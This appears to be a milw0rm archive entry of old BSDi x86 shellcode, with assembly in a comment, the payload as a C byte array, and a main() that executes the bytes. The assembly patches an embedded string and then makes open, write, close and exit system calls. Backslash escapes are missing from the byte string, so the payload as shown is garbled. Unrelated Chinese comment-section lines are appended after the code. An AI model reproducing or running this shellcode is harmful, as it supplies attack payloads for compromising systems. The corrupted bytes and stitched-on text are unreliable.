/*
BSDi shellcode
jmp 0x57
pop %esi
xor %ebx,%ebx
add $0x8,%ebx
add $0x2,%ebx
mov %bl,0x26(%esi)
xor %ebx,%ebx
add $0x23,%ebx
add $0x23,%ebx
mov %bl,0xffffffa8(%esi)
xor %ebx,%ebx
add $0x26,%ebx
add $0x30,%ebx
mov %bl,0xffffffc2(%esi)
xor %eax,%eax
mov %al,0xb(%esi)
mov %esi,%ebx
add $0x5,%eax
xor %ecx,%ecx
add $0x1,%ecx
xor %edx,%edx
int $0x80
mov %eax,%ebx
xor %eax,%eax
add $0x4,%eax
xor %edx,%edx
mov %dl,0x27(%esi)
mov %esi,%ecx
add $0xc,%ecx
add $0x1b,%edx
int $0x80
xor %eax,%eax
add $0x6,%eax
int $0x80
xor %eax,%eax
add $0x1,%eax
int $0x80
.string "BIN/SH"
*/
char code[] =
"xebx57x5ex31xdbx83xc3x08x83xc3x02x88x5e"
"x26x31xdbx83xc3x23x83xc3x23x88x5exa8x31"
"xdbx83xc3x26x83xc3x30x88x5exc2x31xc0x88"
"x46x0bx89xf3x83xc0x05x31xc9x83xc1x01x31"
"xd2xcdx80x89xc3x31xc0x83xc0x04x31xd2x88"
"x56x27x89xf1x83xc1x0cx83xc2x1bxcdx80x31"
"xc0x83xc0x06xcdx80x31xc0x83xc0x01xcdx80"
"BIN/SH";
main()
{
int (*f)();
f = (int (*)()) code;
printf("BSDi old shellcode, %d bytesn", strlen(code));
(int)(*f)();
}
// milw0rm.com [2004-09-26]
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666